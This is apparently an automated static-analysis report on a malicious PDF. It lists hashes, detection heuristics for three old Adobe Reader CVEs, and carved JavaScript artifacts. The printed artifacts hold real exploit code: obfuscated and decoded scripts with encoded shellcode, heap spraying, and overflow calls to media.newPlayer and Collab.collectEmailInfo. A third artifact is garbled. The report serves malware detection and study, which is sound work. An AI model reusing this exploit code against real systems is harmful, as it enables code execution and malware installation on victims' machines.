Malicious PDF — malware analysis report

Static analysis result for SHA-256 6a53ca5512811579…

MALICIOUS

PDF

6.7 KB
MD5: 471d3ce16d58abd612d0dfbc61392131 SHA-1: c9e1b25f93c614047115d7a33533aa4e0c120689 SHA-256: 6a53ca55128115799365509a45cecd90cadc64c71de6cac84e87d11658727da6
476 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF file contains obfuscated JavaScript that exploits multiple known vulnerabilities in Adobe Reader, including CVE-2007-5659, CVE-2009-0927, and CVE-2009-4324. The JavaScript is designed to download and execute a second-stage payload, as indicated by the 'Js.Exploit.Shellcode-18' ClamAV detection and the ML classifier flagging it as highly malicious. The specific URLs for the second-stage payload are not directly visible due to obfuscation, but the exploit cluster and shellcode detection strongly suggest a downloader pattern.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0039_000.js
f1e2ce4fa51330ce9cb8a52deb730b6abb0ece2cdd0e5e2816263e03d676adb8		 pdf-javascript-stream PDF /JS object 39 at offset 0x16F 20681 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
MMPLv86="a4r46A4D=[75,88,67,78,89,68,66,67,13,75,68,85,114,68,89,5,84,76,95,"; MMPLv86+= "94,93,1,65,72,67,4,86,90,69,68,65,72,5,84,76,95,94,93,3,6"; MMPLv86+= "5,72,67,74,89,69,7,31,17,65,72,67,4,86,84,76,95,94,93,6,1"; MMPLv86+= "6,84,76,95,94,93,22,80,84,76,95,94,93,16,84,76,95,94,93,3"; MMPLv86+= ",94,88,79,94,89,95,68,67,74,5,29,1,65,72,67,2,31,4,22,95,"; MMPLv86+= "72,89,88,95,67,13,84,76,95,94,93,22,80,32,39,75,88,67,78,"; MMPLv86+= "89,68,66,67,13,67,72,90,93,65,76,84,72,95,5,4,86,32,39,91"; MMPLv86+= ",76,95,13,94,69,72,65,65,78,66,73,72,13,16,13,88,67,72,94"; MMPLv86+= ",78,76,93,72,5,15,8,88,28,28,104,111,8,88,25,111,24,111,8"; MMPLv86+= ",88,110,20,30,30,8,88,21,28,27,27,8,88,108,107,110,20,8,8"; MMPLv86+= "8,21,29,29,28,8,88,29,111,30,25,8,88,104,31,108,27,8,88,1"; MMPLv86+= "04,111,107,108,8,88,104,21,29,24,8,88,107,107,104,108,8,8"; MMPLv86+= "8,107,107,107,107,8,88,26,110,25,107,8,88,108,27,108,27,8"; MMPLv86+= ",88,107,20,108,27,8,88,29,26,110,31,8,88,108,27,20,27,8,8"; MMPLv86+= "8,108,27,108,27,8,88,104,27,31,105,8,88,31,105,108,108,8,"; MMPLv86+= "88,111,108,105,27,8,88,31,105,29,111,8,88,108,104,110,104"; MMPLv86+= ",8,88,105,27,31,105,8,88,31,105,21,27,8,88,31,27,108,27,8"; MMPLv86+= ",88,110,105,20,21,8,88,24,24,105,30,8,88,104,29,104,29,8,"; MMPLv86+= "88,20,21,31,27,8,88,105,30,110,30,8,88,104,29,25,108,8,88"; MMPLv86+= ",31,27,104,29,8,88,105,25,20,21,8,88,24,28,105,30,8,88,10"; MMPLv86+= "4,29,104,29,8,88,20,21,31,27,8,88,105,30,110,21,8,88,31,1"; MMPLv86+= "05,24,27,8,88,110,110,24,28,8,88,107,107,108,24,8,88,107,"; MMPLv86+= "105,25,104,8,88,108,27,108,27,8,88,25,25,108,27,8,88,110,"; MMPLv86+= "104,24,107,8,88,110,21,110,20,8,88,108,27,108,27,8,88,105"; MMPLv86+= ",30,110,104,8,88,110,108,105,25,8,88,107,31,110,111,8,88,"; MMPLv86+= "111,29,24,20,8,88,25,104,31,105,8,88,104,30,25,104,8,88,1"; MMPLv86+= "08,27,108,27,8,88,110,104,108,27,8,88,20,24,110,108,8,88,"; MMPLv86+= "108,27,20,25,8,88,105,24,110,104,8,88,110,30,110,104,8,88"; MMPLv86+= ",107,31,110,108,8,88,111,29,24,20,8,88,25,104,31,105,8,88"; MMPLv86+= ",20,26,25,104,8,88,108,27,108,27,8,88,31,24,108,27,8,88,1"; MMPLv86+= "04,27,25,108,8,88,26,108,31,105,8,88,110,110,107,24,8,88,"; MMPLv86+= "24,20,104,27,8,88,108,31,107,29,8,88,108,31,27,28,8,88,11"; MMPLv86+= "0,26,108,24,8,88,110,30,21,21,8,88,110,29,105,104,8,88,10"; MMPLv86+= "4,31,27,28,8,88,108,31,108,24,8,88,108,27,110,30,8,88,27,"; MMPLv86+= "27,20,24,8,88,107,27,107,27,8,88,107,28,107,24,8,88,24,20"; MMPLv86+= ",107,27,8,88,108,108,107,29,8,88,26,108,31,105,8,88,107,2"; MMPLv86+= "7,107,27,8,88,107,24,107,27,8,88,107,27,107,27,8,88,107,2"; MMPLv86+= "9,24,20,8,88,24,20,111,27,8,88,108,104,107,29,8,88,107,29"; MMPLv86+= ",107,26,8,88,105,30,31,105,8,88,31,105,20,108,8,88,21,21,"; MMPLv86+= "105,31,8,88,108,24,105,104,8,88,107,29,24,30,8,88,105,29,"; MMPLv86+= "31,105,8,88,108,24,21,27,8,88,20,24,24,30,8,88,104,107,27"; MMPLv86+= ",107,8,88,29,111,104,26,8,88,27,30,108,24,8,88,26,105,20,"; MMPLv86+= "24,8,88,28,21,108,20,8,88,20,110,111,27,8,88,105,31,26,29"; MMPLv86+= ",8,88,27,26,108,104,8,88,108,111,27,105,8,88,26,110,108,2"; MMPLv86+= "4,8,88,25,105,104,27,8,88,20,105,24,26,8,88,105,30,111,20"; MMPLv86+= ",8,88,107,21,25,28,8,88,107,21,31,105,8,88,108,24,21,31,8"; MMPLv86+= ",88,110,29,26,111,8,88,108,108,31,105,8,88,31,105,104,105"; MMPLv86+= ",8,88,111,108,107,21,8,88,26,111,108,24,8,88,108,31,31,10"; MMPLv86+= "5,8,88,108,24,31,105,8,88,29,105,27,30,8,88,107,107,107,2"; MMPLv86+= "1,8,88,25,104,27,24,8,88,24,20,21,26,8,88,24,20,24,20,8,8"; MMPLv86+= "8,104,21,31,21,8,88,25,108,108,21,8,88,27,110,20,24,8,88,"; MMPLv86+= "107,105,31,110,8,88,26,104,105,21,8,88,105,24,25,25,8,88,"; MMPLv86+= "111,110,20,29,8,88,105,27,21,20,8,88,28,105,107,21,8,88,1"; MMPLv86+= "11,105,25,26,8,88,105,31,110,104,8,88,105,27,105,31,8,88,"; MMPLv86+= "21,20,20,110,8,88,105,26,21,20,8,88,105,24,105,27,8,88,20"; MMPLv86+= ",25,110,105,8,88,105,25,21,21,8,88,21,20,105,30,8,88,20,2"; MMPLv86+= "7,105,24,8,88,20,28,105,107,8,88,105,26,105,104,8,88,21,2"; MMPLv86+= "0,20,25,8,88,110,107,110,105,8
... (truncated)
legacy_pdfkit_stage_000.js
7b037fa54190e770de0dcf95257be25307cfa7f02f349897a3cc5594440f0b09		 deobfuscated-js numeric array XOR decoded JavaScript at offset 0x16F 5326 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 9 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;}
function newplayer(){
var shellcode = unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD789%uD5D6%u94CD%uD488%u89D3%u96D5%u91DF%uD7DE%u8994%uCFCD%uC5DF%uD5D7%u8896%uCED6%u99D6%uD6D5%u9BCA%uC2D6%uF9C0%uC3C8%uF6D1%uC7CA%uC3DF%u80D4%uCEC0%uA69B");
var block = unescape("%u0c0c%u0c0c");
var GDagaCuyNfRSFzaSZLO = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u514e%u4865%u4844%u724f%u4a6e%u6d43%u4b51%u4b79%u7156%u4d41%u5944%u596b%u7979%u625a%u626f%u7a6e%u634e%u4a4d%u6341%u6253%u4154%u5670%u5543%u4273%u4c51%u576d%u5772%u5670");
while(block.length <= 32768) block+=block;
block=block.substring(0,32768 - shellcode.length);
memory=new Array();for(i=0;i<0x2000;i++) {memory[i]= block + shellcode;}
util.printd("rlpPpjTXXIncUhwagCzcuHfmkzObBSZDGNdC", new Date());
util.printd("SotSxNQvMqKNjJkIXioKlmfZYfmiPGgGNNKn", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(GDagaCuyNfRSFzaSZLO, new Date());}

function collab_email(){var shellcode=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD789%uD5D6%u94CD%uD488%u89D3%u96D5%u91DF%uD7DE%u8994%uCFCD%uC5DF%uD5D7%u8896%uCED6%u99D6%uD6D5%u9BCA%uC2D6%uF9C0%uCBC3%uCFC7%u80CA%uCEC0%uA69B");var mem_array=new Array();var cc=0x0c0c0c0c;var addr=0x400000;var sc_len=shellcode.length*2;var len=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var count2=(cc-0x400000)/addr;for(var count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;}
var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}

function collab_geticon(){if(app.doc.Collab.getIcon){var arry=new Array();var vvpethya=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF8
... (truncated)
legacy_pdfkit_stage_001.js
db5c1d3958e2b4bba5744133d69607db6a5ba2fb737c60c90a50a046de2b5d8f		 deobfuscated-js numPages XOR decoded JavaScript at offset 0x16F 5326 bytes
Preview script
First 1,000 lines of the extracted script
FUNCTION FIX IT YARSP LEN	[WHILE YARSP LENGTH
  LEN	[YARSP  YARSP ]YARSP YARSP SUBSTRING   LEN  	 RETURN YARSP ]-*FUNCTION NEWPLAYER 	[-*VAR SHELLCODE   UNESCAPE   U  eb U b b Uc    U     Uafc  U     U b   Ue a  Uebfa Ue    Uffea Uffff U c f Ua a  Uf a  U  c  Ua    Ua a  Ue  d U daa Ubad  U d b Uaece Ud  d U d   U  a  Ucd   U  d  Ue e  U     Ud c  Ue  a U  e  Ud    U  d  Ue e  U     Ud c  U d   Ucc   Uffa  Ufd e Ua a  U  a  Uce f Uc c  Ua a  Ud ce Ucad  Uf cb Ub    U e d Ue  e Ua a  Ucea  U  ca Ua    Ud ce Uc ce Uf ca Ub    U e d U   e Ua a  U  a  Ue  a U a d Uccf  U  e  Ua f  Ua    Uc a  Uc    Uc de Ue    Ua a  Ua c  U     Uf f  Uf f  U  f  Uaaf  U a d Uf f  Uf f  Uf f  Uf    U  b  Uaef  Uf f  Ud  d U d a U  d  Ua de Uf    Ud  d Ua    U     Uef f U be  U  a  U d   U  a  U cb  Ud    U  ae Uab d U ca  U de  U d   Ud b  Uf    Uf  d Ua    Uc  b Uaa d U ded Ubaf  U ba  Ua  d Ua  d U d   Ufff  U e   U     U     Ue    U aa  U c   Ufd c U ed  Ud    Ubc   Ud    U df  Ubd   Ud ce Ud d  U   c Ud    Ud d  U  cd Ud    U  d  U  d  U  df Ud de U     Ucfcd Uc df Ud d  U     Uced  U  d  Ud d  U bca Uc d  Uf c  Uc c  Uf d  Uc ca Uc df U  d  Ucec  Ua  b 	 -*VAR BLOCK   UNESCAPE   U C C U C C 	 -*VAR gdAGAcUYnFrsfZAszlo   UNESCAPE   U C C U C C U C C U C C U C C U C C U C C U C C U   E U     U     U   F U A E U D   U B   U B   U     U D   U     U   B U     U   A U   F U A E U   E U A D U     U     U     U     U     U     U C   U   D U     U     	 -*WHILE BLOCK LENGTH         	 BLOCK  BLOCK -*BLOCK BLOCK SUBSTRING         
 SHELLCODE LENGTH	 -*MEMORY NEW aRRAY 	 FOR I   I  X     I  	 [MEMORY{I}  BLOCK   SHELLCODE ]-*UTIL PRINTD  RLPpPJtxxiNCuHWAGcZCUhFMKZoBbszdgnDc   NEW dATE 		 -*UTIL PRINTD  sOTsXnqVmQknJjKixIOkLMFzyFMIpgGgnnkN   NEW dATE 		 -*TRY [THIS MEDIA NEWpLAYER NULL	 ] CATCH E	 []-*UTIL PRINTD gdAGAcUYnFrsfZAszlo  NEW dATE 		 ]-*-*FUNCTION COLLAB EMAIL 	[VAR SHELLCODE UNESCAPE   U  eb U b b Uc    U     Uafc  U     U b   Ue a  Uebfa Ue    Uffea Uffff U c f Ua a  Uf a  U  c  Ua    Ua a  Ue  d U daa Ubad  U d b Uaece Ud  d U d   U  a  Ucd   U  d  Ue e  U     Ud c  Ue  a U  e  Ud    U  d  Ue e  U     Ud c  U d   Ucc   Uffa  Ufd e Ua a  U  a  Uce f Uc c  Ua a  Ud ce Ucad  Uf cb Ub    U e d Ue  e Ua a  Ucea  U  ca Ua    Ud ce Uc ce Uf ca Ub    U e d U   e Ua a  U  a  Ue  a U a d Uccf  U  e  Ua f  Ua    Uc a  Uc    Uc de Ue    Ua a  Ua c  U     Uf f  Uf f  U  f  Uaaf  U a d Uf f  Uf f  Uf f  Uf    U  b  Uaef  Uf f  Ud  d U d a U  d  Ua de Uf    Ud  d Ua    U     Uef f U be  U  a  U d   U  a  U cb  Ud    U  ae Uab d U ca  U de  U d   Ud b  Uf    Uf  d Ua    Uc  b Uaa d U ded Ubaf  U ba  Ua  d Ua  d U d   Ufff  U e   U     U     Ue    U aa  U c   Ufd c U ed  Ud    Ubc   Ud    U df  Ubd   Ud ce Ud d  U   c Ud    Ud d  U  cd Ud    U  d  U  d  U  df Ud de U     Ucfcd Uc df Ud d  U     Uced  U  d  Ud d  U bca Uc d  Uf c  Ucbc  Ucfc  U  ca Ucec  Ua  b 	 VAR MEM ARRAY NEW aRRAY 	 VAR CC  X C C C C VAR ADDR  X       VAR SC LEN SHELLCODE LENGTH
  VAR LEN ADDR
 SC LEN  X  	 VAR YARSP UNESCAPE   U     U     	 YARSP FIX IT YARSP LEN	 VAR COUNT   CC
 X      	 ADDR FOR VAR COUNT   COUNT COUNT  COUNT  	[MEM ARRAY{COUNT} YARSP SHELLCODE ]-*VAR OVERFLOW UNESCAPE   U C C U C C 	 WHILE OVERFLOW LENGTH      	[OVERFLOW  OVERFLOW ]-*THIS COLLABsTORE cOLLAB COLLECTeMAILiNFO [SUBJ    MSG OVERFLOW]	 ]-*-*FUNCTION COLLAB GETICON 	[IF APP DOC cOLLAB GETiCON	[VAR ARRY NEW aRRAY 	 VAR VVPETHYA UNESCAPE   U  eb U b b Uc    U     Uafc  U     U b   Ue a  Uebfa Ue    Uffea Uffff U c f Ua a  Uf a  U  c  Ua    Ua a  Ue  d U daa Ubad  U d b Uaece Ud  d U d   U  a  Ucd   U  d  Ue e  U     Ud c  Ue  a U  e  Ud    U  d  Ue e  U     Ud c  U d   Ucc   Uffa  Ufd e Ua a  U  a  Uce f Uc c  Ua a  Ud ce Ucad  Uf cb Ub    U e d Ue  e Ua a  Ucea  U  ca Ua    Ud ce Uc ce Uf ca Ub    U e d U   e Ua a  U  a  Ue  a U a d Uccf  U  e  Ua f  Ua    Uc a  Uc    Uc de Ue    Ua a  Ua c  U     Uf f  Uf f  U  f  Uaaf  U a d Uf f  Uf f  Uf f  Uf    U  b  Uaef  Uf f  Ud  d U d a U  d  Ua de Uf    Ud  d Ua    U     Uef f U be  U  a  U d   U  a  U cb  Ud    U  ae Uab d U ca  U de  U d   Ud b  Uf    Uf 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.